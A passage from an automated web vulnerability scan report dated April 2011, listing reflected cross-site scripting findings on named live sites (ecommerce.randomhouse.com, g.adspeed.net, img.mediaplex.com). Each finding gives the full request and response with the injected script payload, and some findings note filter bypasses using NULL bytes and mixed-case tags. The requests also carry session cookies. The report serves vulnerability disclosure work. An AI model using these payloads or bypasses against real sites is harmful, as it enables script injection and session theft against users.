<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
</script>.86d84<script>alert(1)</script>db18887c0e9">
...[SNIP]...

5.129. https://ecommerce.randomhouse.com/password.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /password.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2402d"style%3d"x%3aexpr/**/ession(alert(1))"942e8dd2de1 was submitted in the from parameter. This input was echoed as 2402d"style="x:expr/**/ession(alert(1))"942e8dd2de1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /password.do?from=2402d"style%3d"x%3aexpr/**/ession(alert(1))"942e8dd2de1 HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:21:27 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 11462


<!-- forgottenPassword.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="htt
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=2402d"style="x:expr/**/ession(alert(1))"942e8dd2de1">
...[SNIP]...

5.130. https://ecommerce.randomhouse.com/password.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /password.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d764b"><script>alert(1)</script>ff6160e5949 was submitted in the from parameter. This input was echoed as d764b"><script>alert(1)</script>ff6160e5949 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /password.do?from=%00d764b"><script>alert(1)</script>ff6160e5949 HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:21:32 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 11441


<!-- forgottenPassword.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="htt
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=.d764b"><script>alert(1)</script>ff6160e5949">
...[SNIP]...

5.131. https://ecommerce.randomhouse.com/sign-in-submit.do [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in-submit.do

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8a7"><script>alert(1)</script>e76a6b52e057de0cb was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sign-in-submit.do?email=2d8a7"><script>alert(1)</script>e76a6b52e057de0cb&password= HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/sign-in.do
Cache-Control: max-age=0
Origin: https://ecommerce.randomhouse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366; s_cc=true; RES_SESSIONID=212207240983843; ResonanceSegment=1; CP=null*; s_sq=ranhcorporate%2Cranhrollup%3D%2526pid%253Dsignin%2526pidt%253D1%2526oid%253Djavascript%25253Adocument.forms.signInForm.submit%252528%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:40:08 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17136


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<input type="text" name="email" value="2d8a7"><script>alert(1)</script>e76a6b52e057de0cb" size="30" />
...[SNIP]...

5.132. https://ecommerce.randomhouse.com/sign-in-submit.do [password parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in-submit.do

Issue detail

The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d019"><script>alert(1)</script>c69c47f83fc5ae963 was submitted in the password parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sign-in-submit.do?email=&password=4d019"><script>alert(1)</script>c69c47f83fc5ae963 HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/sign-in.do
Cache-Control: max-age=0
Origin: https://ecommerce.randomhouse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366; s_cc=true; RES_SESSIONID=212207240983843; ResonanceSegment=1; CP=null*; s_sq=ranhcorporate%2Cranhrollup%3D%2526pid%253Dsignin%2526pidt%253D1%2526oid%253Djavascript%25253Adocument.forms.signInForm.submit%252528%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:41:50 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16987


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<input type="password" name="password" value="4d019"><script>alert(1)</script>c69c47f83fc5ae963" size="30" />
...[SNIP]...

5.133. https://ecommerce.randomhouse.com/sign-in.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0010afa"style%3d"x%3aexpression(alert(1))"6551a8508b2 was submitted in the from parameter. This input was echoed as 10afa"style="x:expression(alert(1))"6551a8508b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /sign-in.do?from=%0010afa"style%3d"x%3aexpression(alert(1))"6551a8508b2 HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:20:59 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 17147


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=.10afa"style="x:expression(alert(1))"6551a8508b2">
...[SNIP]...

5.134. https://ecommerce.randomhouse.com/sign-in.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ec7"><script>alert(1)</script>c88b024cdae was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sign-in.do?from=randomhoused3ec7"><script>alert(1)</script>c88b024cdae HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/account.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=388CC68FD235E0B3FC2D6F4CD6E761C9.ecommerce_wrk1; SC_LINKS=%5B%5BB%5D%5D; CP=null*; mbox=check#true#1303855669|session#1303855598284-166145#1303857469|PC#1303855598284-166145#1366927609; s_cc=true; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_sq=ranhcorporate%2Cranhrollup%3D%2526pid%253Dsignin%2526pidt%253D1%2526oid%253Dhttps%25253A//ecommerce.randomhouse.com/sign-in.do%25253Ffrom%25253Drandomhouse%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:07:04 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17195


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=randomhoused3ec7"><script>alert(1)</script>c88b024cdae">
...[SNIP]...

5.135. https://ecommerce.randomhouse.com/sign-in.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 182e6"%3b566f826a9ff was submitted in the from parameter. This input was echoed as 182e6";566f826a9ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sign-in.do?from=182e6"%3b566f826a9ff HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:21:02 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 16907


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<!--
var s_account="ranhcorporate,ranhrollup";
var rh_division="Random House Corporate";
var rh_imprint="";
var rh_store="182e6";566f826a9ff";
//-->
...[SNIP]...

5.136. https://ecommerce.randomhouse.com/sign-in.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6f8e</script>0cfb073a38a was submitted in the from parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sign-in.do?from=b6f8e</script>0cfb073a38a HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:21:44 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 16963


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<!--
   // extract 'from' param
   var url = window.location.href;
   var paramStart = url.indexOf("?");
   var fromParam = '';
   if( 'b6f8e</script>0cfb073a38a' == '') {
       if( paramStart != -1) {
           var paramString = url.substr(paramStart + 1);
           var tokenStart = paramString.indexOf('from');
           if( tokenStart != -1) {
               var token = paramString.substr(toke
...[SNIP]...

5.137. https://ecommerce.randomhouse.com/sign-in.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8336"%3balert(1)//1decb9d5a21 was submitted in the from parameter. This input was echoed as a8336";alert(1)//1decb9d5a21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sign-in.do?from=randomhousea8336"%3balert(1)//1decb9d5a21 HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/account.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=388CC68FD235E0B3FC2D6F4CD6E761C9.ecommerce_wrk1; SC_LINKS=%5B%5BB%5D%5D; CP=null*; mbox=check#true#1303855669|session#1303855598284-166145#1303857469|PC#1303855598284-166145#1366927609; s_cc=true; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_sq=ranhcorporate%2Cranhrollup%3D%2526pid%253Dsignin%2526pidt%253D1%2526oid%253Dhttps%25253A//ecommerce.randomhouse.com/sign-in.do%25253Ffrom%25253Drandomhouse%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:07:07 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17075


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<!--
var s_account="ranhcorporate,ranhrollup";
var rh_division="Random House Corporate";
var rh_imprint="";
var rh_store="randomhousea8336";alert(1)//1decb9d5a21";
//-->
...[SNIP]...

5.138. http://g.adspeed.net/ad.php [ht parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.adspeed.net
Path:   /ad.php

Issue detail

The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a312"><script>alert(1)</script>2753c92f034 was submitted in the ht parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad.php?do=html&zid=14678&wd=728&ht=903a312"><script>alert(1)</script>2753c92f034&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388 HTTP/1.1
Host: g.adspeed.net
Proxy-Connection: keep-alive
Referer: http://seclists.org/fulldisclosure/2011/Apr/388
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Tue, 26 Apr 2011 21:51:52 GMT
Server: AdSpeed/s10
Content-Length: 397

<html><head><title>Ad Serving Error Message</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><a href="http://www.adspeed.com/Knowledges/qu
...[SNIP]...
<img style="border:0px;" src="http://g.adspeed.net/ad.php?do=error&type=-1&wd=728&ht=903a312"><script>alert(1)</script>2753c92f034" alt="i" />
...[SNIP]...

5.139. http://g.adspeed.net/ad.php [wd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.adspeed.net
Path:   /ad.php

Issue detail

The value of the wd request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da22"><ScRiPt>alert(1)</ScRiPt>f8712c21f3c was submitted in the wd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request

GET /ad.php?do=html&zid=14678&wd=7287da22"><ScRiPt>alert(1)</ScRiPt>f8712c21f3c&ht=90&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388 HTTP/1.1
Host: g.adspeed.net
Proxy-Connection: keep-alive
Referer: http://seclists.org/fulldisclosure/2011/Apr/388
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Tue, 26 Apr 2011 21:51:50 GMT
Server: AdSpeed/s10
Content-Length: 397

<html><head><title>Ad Serving Error Message</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><a href="http://www.adspeed.com/Knowledges/qu
...[SNIP]...
<img style="border:0px;" src="http://g.adspeed.net/ad.php?do=error&type=-1&wd=7287da22"><ScRiPt>alert(1)</ScRiPt>f8712c21f3c&ht=90" alt="i" />
...[SNIP]...

5.140. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b09e"><script>alert(1)</script>f7c22091cea was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D8b09e"><script>alert(1)</script>f7c22091cea&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:39:43 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 01:02:26 GMT
ETag: "66ad7c-11e2-4a1634b6b4c80"
Accept-Ranges: bytes
Content-Length: 5215
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://altfarm.mediaplex.com/ad/ck/10105-114325-2060-5?mpt=[1394099180ER]&mpt2=[1394099180ER]8b09e"><script>alert(1)</script>f7c22091cea" target="_blank">
...[SNIP]...

5.141. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4679e"-alert(1)-"a62aee2375a was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D4679e"-alert(1)-"a62aee2375a&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:39:43 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 01:02:26 GMT
ETag: "66ad7c-11e2-4a1634b6b4c80"
Accept-Ranges: bytes
Content-Length: 5140
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://altfarm.mediaplex.com/ad/ck/10105-114325-2060-5?mpt=[1394099180ER]&mpt2=[1394099180ER]4679e"-ale
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D4679e"-alert(1)-"a62aee2375a");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5
...[SNIP]...

5.142. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html

Issue detail

